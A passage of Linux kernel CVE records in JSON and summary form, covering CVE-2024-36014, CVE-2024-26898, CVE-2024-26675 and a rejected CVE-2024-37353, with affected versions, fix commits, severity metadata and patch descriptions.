"url": "https://git.kernel.org/stable/c/a5fa5b40a278a3ca978fed64707bd27614adb1eb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3e54d4e95120641216dfe91a6c49f116a9f68490"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e4b52d49383306ef73fd1bd9102538beebb0fe07"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/335cc45ef2b81b68be63c698b4f867a530bdf7a5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b77620730f614059db2470e8ebab3e725280fc6d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/93f76ec1eddce60dbb5885cbc0d7df54adee4639"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a1f95aede6285dba6dd036d907196f35ae3a11ea"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/arm/malidp_mw.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b6cc5dd06336ed8bb3a7a1fc5aaf7d5e88bc0818",
"status": "affected",
"version": "8cbc5caf36ef7a299b5cbedf55f27fd898d700bf",
"versionType": "git"
},
{
"lessThan": "565d9ad7e5a18eb69ed8b66a9e9bb3f45346520c",
"status": "affected",
"version": "8cbc5caf36ef7a299b5cbedf55f27fd898d700bf",
"versionType": "git"
},
{
"lessThan": "a5fa5b40a278a3ca978fed64707bd27614adb1eb",
"status": "affected",
"version": "8cbc5caf36ef7a299b5cbedf55f27fd898d700bf",
"versionType": "git"
},
{
"lessThan": "3e54d4e95120641216dfe91a6c49f116a9f68490",
"status": "affected",
"version": "8cbc5caf36ef7a299b5cbedf55f27fd898d700bf",
"versionType": "git"
},
{
"lessThan": "e4b52d49383306ef73fd1bd9102538beebb0fe07",
"status": "affected",
"version": "8cbc5caf36ef7a299b5cbedf55f27fd898d700bf",
"versionType": "git"
},
{
"lessThan": "335cc45ef2b81b68be63c698b4f867a530bdf7a5",
"status": "affected",
"version": "8cbc5caf36ef7a299b5cbedf55f27fd898d700bf",
"versionType": "git"
},
{
"lessThan": "b77620730f614059db2470e8ebab3e725280fc6d",
"status": "affected",
"version": "8cbc5caf36ef7a299b5cbedf55f27fd898d700bf",
"versionType": "git"
},
{
"lessThan": "93f76ec1eddce60dbb5885cbc0d7df54adee4639",
"status": "affected",
"version": "8cbc5caf36ef7a299b5cbedf55f27fd898d700bf",
"versionType": "git"
},
{
"lessThan": "a1f95aede6285dba6dd036d907196f35ae3a11ea",
"status": "affected",
"version": "8cbc5caf36ef7a299b5cbedf55f27fd898d700bf",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/arm/malidp_mw.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.19"
},
{
"lessThan": "4.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.12",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.3",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/arm/malidp: fix a possible null pointer dereference\n\nIn malidp_mw_connector_reset, new memory is allocated with kzalloc, but\nno check is performed. In order to prevent null pointer dereferencing,\nensure that mw_state is checked before calling\n__drm_atomic_helper_connector_reset."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:10:31.218Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b6cc5dd06336ed8bb3a7a1fc5aaf7d5e88bc0818"
},
{
"url": "https://git.kernel.org/stable/c/565d9ad7e5a18eb69ed8b66a9e9bb3f45346520c"
},
{
"url": "https://git.kernel.org/stable/c/a5fa5b40a278a3ca978fed64707bd27614adb1eb"
},
{
"url": "https://git.kernel.org/stable/c/3e54d4e95120641216dfe91a6c49f116a9f68490"
},
{
"url": "https://git.kernel.org/stable/c/e4b52d49383306ef73fd1bd9102538beebb0fe07"
},
{
"url": "https://git.kernel.org/stable/c/335cc45ef2b81b68be63c698b4f867a530bdf7a5"
},
{
"url": "https://git.kernel.org/stable/c/b77620730f614059db2470e8ebab3e725280fc6d"
},
{
"url": "https://git.kernel.org/stable/c/93f76ec1eddce60dbb5885cbc0d7df54adee4639"
},
{
"url": "https://git.kernel.org/stable/c/a1f95aede6285dba6dd036d907196f35ae3a11ea"
}
],
"title": "drm/arm/malidp: fix a possible null pointer dereference",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36014",
"datePublished": "2024-05-29T06:06:25.631Z",
"dateReserved": "2024-05-17T13:50:33.153Z",
"dateUpdated": "2025-11-04T17:20:54.977Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-37353 (GCVE-0-2024-37353)
Vulnerability from cvelistv5
This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.
Show details on NVD website{
"containers": {
"cna": {
"providerMetadata": {
"dateUpdated": "2024-08-21T23:54:07.622Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"rejectedReasons": [
{
"lang": "en",
"value": "This CVE ID has been rejected or withdrawn by its CVE Numbering Authority."
}
]
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-37353",
"datePublished": "2024-06-21T10:18:10.995Z",
"dateRejected": "2024-08-21T23:54:07.622Z",
"dateReserved": "2024-06-21T10:13:16.289Z",
"dateUpdated": "2024-08-21T23:54:07.622Z",
"state": "REJECTED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26898 (GCVE-0-2024-26898)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 08:59
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
aoe: fix the potential use-after-free problem in aoecmd_cfg_pkts
This patch is against CVE-2023-6270. The description of cve is:
A flaw was found in the ATA over Ethernet (AoE) driver in the Linux
kernel. The aoecmd_cfg_pkts() function improperly updates the refcnt on
`struct net_device`, and a use-after-free can be triggered by racing
between the free on the struct and the access through the `skbtxq`
global queue. This could lead to a denial of service condition or
potential code execution.
In aoecmd_cfg_pkts(), it always calls dev_put(ifp) when skb initial
code is finished. But the net_device ifp will still be used in
later tx()->dev_queue_xmit() in kthread. Which means that the
dev_put(ifp) should NOT be called in the success path of skb
initial code in aoecmd_cfg_pkts(). Otherwise tx() may run into
use-after-free because the net_device is freed.
This patch removed the dev_put(ifp) in the success path in
aoecmd_cfg_pkts(), and added dev_put() after skb xmit in tx().
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 7562f876cd93800f2f8c89445f2a563590b24e09 Version: 7562f876cd93800f2f8c89445f2a563590b24e09 Version: 7562f876cd93800f2f8c89445f2a563590b24e09 Version: 7562f876cd93800f2f8c89445f2a563590b24e09 Version: 7562f876cd93800f2f8c89445f2a563590b24e09 Version: 7562f876cd93800f2f8c89445f2a563590b24e09 Version: 7562f876cd93800f2f8c89445f2a563590b24e09 Version: 7562f876cd93800f2f8c89445f2a563590b24e09 Version: 7562f876cd93800f2f8c89445f2a563590b24e09 |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:2.6.22:-:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "2.6.22"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "ad80c34944d7",
"status": "affected",
"version": "7562f876cd93",
"versionType": "git"
},
{
"lessThan": "1a54aa506b3b",
"status": "affected",
"version": "7562f876cd93",
"versionType": "git"
},
{
"lessThan": "faf0b4c5e00b",
"status": "affected",
"version": "7562f876cd93",
"versionType": "git"
},
{
"lessThan": "7dd09fa80b07",
"status": "affected",
"version": "7562f876cd93",
"versionType": "git"
},
{
"lessThan": "74ca3ef68d2f",
"status": "affected",
"version": "7562f876cd93",
"versionType": "git"
},
{
"lessThan": "eb48680b0255",
"status": "affected",
"version": "7562f876cd93",
"versionType": "git"
},
{
"lessThan": "079cba4f4e30",
"status": "affected",
"version": "7562f876cd93",
"versionType": "git"
},
{
"lessThan": "a16fbb800646",
"status": "affected",
"version": "7562f876cd93",
"versionType": "git"
},
{
"lessThan": "f98364e92662",
"status": "affected",
"version": "7562f876cd93",
"versionType": "git"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26898",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-12T16:22:28.091007Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-07-22T14:55:25.413Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.475Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ad80c34944d7175fa1f5c7a55066020002921a99"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1a54aa506b3b2f31496731039e49778f54eee881"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/faf0b4c5e00bb680e8e43ac936df24d3f48c8e65"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7dd09fa80b0765ce68bfae92f4e2f395ccf0fba4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/74ca3ef68d2f449bc848c0a814cefc487bf755fa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eb48680b0255a9e8a9bdc93d6a55b11c31262e62"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/079cba4f4e307c69878226fdf5228c20aa1c969c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a16fbb80064634b254520a46395e36b87ca4731e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f98364e926626c678fb4b9004b75cacf92ff0662"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/block/aoe/aoecmd.c",
"drivers/block/aoe/aoenet.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ad80c34944d7175fa1f5c7a55066020002921a99",
"status": "affected",
"version": "7562f876cd93800f2f8c89445f2a563590b24e09",
"versionType": "git"
},
{
"lessThan": "1a54aa506b3b2f31496731039e49778f54eee881",
"status": "affected",
"version": "7562f876cd93800f2f8c89445f2a563590b24e09",
"versionType": "git"
},
{
"lessThan": "faf0b4c5e00bb680e8e43ac936df24d3f48c8e65",
"status": "affected",
"version": "7562f876cd93800f2f8c89445f2a563590b24e09",
"versionType": "git"
},
{
"lessThan": "7dd09fa80b0765ce68bfae92f4e2f395ccf0fba4",
"status": "affected",
"version": "7562f876cd93800f2f8c89445f2a563590b24e09",
"versionType": "git"
},
{
"lessThan": "74ca3ef68d2f449bc848c0a814cefc487bf755fa",
"status": "affected",
"version": "7562f876cd93800f2f8c89445f2a563590b24e09",
"versionType": "git"
},
{
"lessThan": "eb48680b0255a9e8a9bdc93d6a55b11c31262e62",
"status": "affected",
"version": "7562f876cd93800f2f8c89445f2a563590b24e09",
"versionType": "git"
},
{
"lessThan": "079cba4f4e307c69878226fdf5228c20aa1c969c",
"status": "affected",
"version": "7562f876cd93800f2f8c89445f2a563590b24e09",
"versionType": "git"
},
{
"lessThan": "a16fbb80064634b254520a46395e36b87ca4731e",
"status": "affected",
"version": "7562f876cd93800f2f8c89445f2a563590b24e09",
"versionType": "git"
},
{
"lessThan": "f98364e926626c678fb4b9004b75cacf92ff0662",
"status": "affected",
"version": "7562f876cd93800f2f8c89445f2a563590b24e09",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/block/aoe/aoecmd.c",
"drivers/block/aoe/aoenet.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.22"
},
{
"lessThan": "2.6.22",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "2.6.22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "2.6.22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "2.6.22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "2.6.22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "2.6.22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "2.6.22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "2.6.22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "2.6.22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\naoe: fix the potential use-after-free problem in aoecmd_cfg_pkts\n\nThis patch is against CVE-2023-6270. The description of cve is:\n\n A flaw was found in the ATA over Ethernet (AoE) driver in the Linux\n kernel. The aoecmd_cfg_pkts() function improperly updates the refcnt on\n `struct net_device`, and a use-after-free can be triggered by racing\n between the free on the struct and the access through the `skbtxq`\n global queue. This could lead to a denial of service condition or\n potential code execution.\n\nIn aoecmd_cfg_pkts(), it always calls dev_put(ifp) when skb initial\ncode is finished. But the net_device ifp will still be used in\nlater tx()-\u003edev_queue_xmit() in kthread. Which means that the\ndev_put(ifp) should NOT be called in the success path of skb\ninitial code in aoecmd_cfg_pkts(). Otherwise tx() may run into\nuse-after-free because the net_device is freed.\n\nThis patch removed the dev_put(ifp) in the success path in\naoecmd_cfg_pkts(), and added dev_put() after skb xmit in tx()."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:59:10.977Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ad80c34944d7175fa1f5c7a55066020002921a99"
},
{
"url": "https://git.kernel.org/stable/c/1a54aa506b3b2f31496731039e49778f54eee881"
},
{
"url": "https://git.kernel.org/stable/c/faf0b4c5e00bb680e8e43ac936df24d3f48c8e65"
},
{
"url": "https://git.kernel.org/stable/c/7dd09fa80b0765ce68bfae92f4e2f395ccf0fba4"
},
{
"url": "https://git.kernel.org/stable/c/74ca3ef68d2f449bc848c0a814cefc487bf755fa"
},
{
"url": "https://git.kernel.org/stable/c/eb48680b0255a9e8a9bdc93d6a55b11c31262e62"
},
{
"url": "https://git.kernel.org/stable/c/079cba4f4e307c69878226fdf5228c20aa1c969c"
},
{
"url": "https://git.kernel.org/stable/c/a16fbb80064634b254520a46395e36b87ca4731e"
},
{
"url": "https://git.kernel.org/stable/c/f98364e926626c678fb4b9004b75cacf92ff0662"
}
],
"title": "aoe: fix the potential use-after-free problem in aoecmd_cfg_pkts",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26898",
"datePublished": "2024-04-17T10:27:48.466Z",
"dateReserved": "2024-02-19T14:20:24.186Z",
"dateUpdated": "2025-05-04T08:59:10.977Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26675 (GCVE-0-2024-26675)
Vulnerability from cvelistv5
Published
2024-04-02 07:01
Modified
2025-05-04 08:53
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ppp_async: limit MRU to 64K
syzbot triggered a warning [1] in __alloc_pages():
WARN_ON_ONCE_GFP(order > MAX_PAGE_ORDER, gfp)
Willem fixed a similar issue in commit c0a2a1b0d631 ("ppp: limit MRU to 64K")
Adopt the same sanity check for ppp_async_ioctl(PPPIOCSMRU)
[1]:
WARNING: CPU: 1 PID: 11 at mm/page_alloc.c:4543 __alloc_pages+0x308/0x698 mm/page_alloc.c:4543
Modules linked in:
CPU: 1 PID: 11 Comm: kworker/u4:0 Not tainted 6.8.0-rc2-syzkaller-g41bccc98fb79 #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/17/2023
Workqueue: events_unbound flush_to_ldisc
pstate: 204000c5 (nzCv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--)
pc : __alloc_pages+0x308/0x698 mm/page_alloc.c:4543
lr : __alloc_pages+0xc8/0x698 mm/page_alloc.c:4537
sp : ffff800093967580
x29: ffff800093967660 x28: ffff8000939675a0 x27: dfff800000000000
x26: ffff70001272ceb4 x25: 0000000000000000 x24: ffff8000939675c0
x23: 0000000000000000 x22: 0000000000060820 x21: 1ffff0001272ceb8
x20: ffff8000939675e0 x19: 0000000000000010 x18: ffff800093967120
x17: ffff800083bded5c x16: ffff80008ac97500 x15: 0000000000000005
x14: 1ffff0001272cebc x13: 0000000000000000 x12: 0000000000000000
x11: ffff70001272cec1 x10: 1ffff0001272cec0 x9 : 0000000000000001
x8 : ffff800091c91000 x7 : 0000000000000000 x6 : 000000000000003f
x5 : 00000000ffffffff x4 : 0000000000000000 x3 : 0000000000000020
x2 : 0000000000000008 x1 : 0000000000000000 x0 : ffff8000939675e0
Call trace:
__alloc_pages+0x308/0x698 mm/page_alloc.c:4543
__alloc_pages_node include/linux/gfp.h:238 [inline]
alloc_pages_node include/linux/gfp.h:261 [inline]
__kmalloc_large_node+0xbc/0x1fc mm/slub.c:3926
__do_kmalloc_node mm/slub.c:3969 [inline]
__kmalloc_node_track_caller+0x418/0x620 mm/slub.c:4001
kmalloc_reserve+0x17c/0x23c net/core/skbuff.c:590
__alloc_skb+0x1c8/0x3d8 net/core/skbuff.c:651
__netdev_alloc_skb+0xb8/0x3e8 net/core/skbuff.c:715
netdev_alloc_skb include/linux/skbuff.h:3235 [inline]
dev_alloc_skb include/linux/skbuff.h:3248 [inline]
ppp_async_input drivers/net/ppp/ppp_async.c:863 [inline]
ppp_asynctty_receive+0x588/0x186c drivers/net/ppp/ppp_async.c:341
tty_ldisc_receive_buf+0x12c/0x15c drivers/tty/tty_buffer.c:390
tty_port_default_receive_buf+0x74/0xac drivers/tty/tty_port.c:37
receive_buf drivers/tty/tty_buffer.c:444 [inline]
flush_to_ldisc+0x284/0x6e4 drivers/tty/tty_buffer.c:494
process_one_work+0x694/0x1204 kernel/workqueue.c:2633
process_scheduled_works kernel/workqueue.c:2706 [inline]
worker_thread+0x938/0xef4 kernel/workqueue.c:2787
kthread+0x288/0x310 kernel/kthread.c:388
ret_from_fork+0x10/0x20 arch/arm64/kernel/entry.S:860
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.841Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4fdb14ba89faff6e6969a4dffdc8e54235d6e5ed"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/56fae81633ccee307cfcb032f706bf1863a56982"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b06e067e93fa4b98acfd3a9f38a398ab91bbc58b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/58fbe665b097bf7b3144da7e7b91fb27aa8d0ae3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4e2c4846b2507f6dfc9bea72b7567c2693a82a16"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7e5ef49670766c9742ffcd9cead7cdb018268719"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/210d938f963dddc543b07e66a79b7d8d4bd00bd8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cb88cb53badb8aeb3955ad6ce80b07b598e310b8"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26675",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:53:26.335519Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:36.657Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ppp/ppp_async.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4fdb14ba89faff6e6969a4dffdc8e54235d6e5ed",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "56fae81633ccee307cfcb032f706bf1863a56982",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b06e067e93fa4b98acfd3a9f38a398ab91bbc58b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "58fbe665b097bf7b3144da7e7b91fb27aa8d0ae3",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "4e2c4846b2507f6dfc9bea72b7567c2693a82a16",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
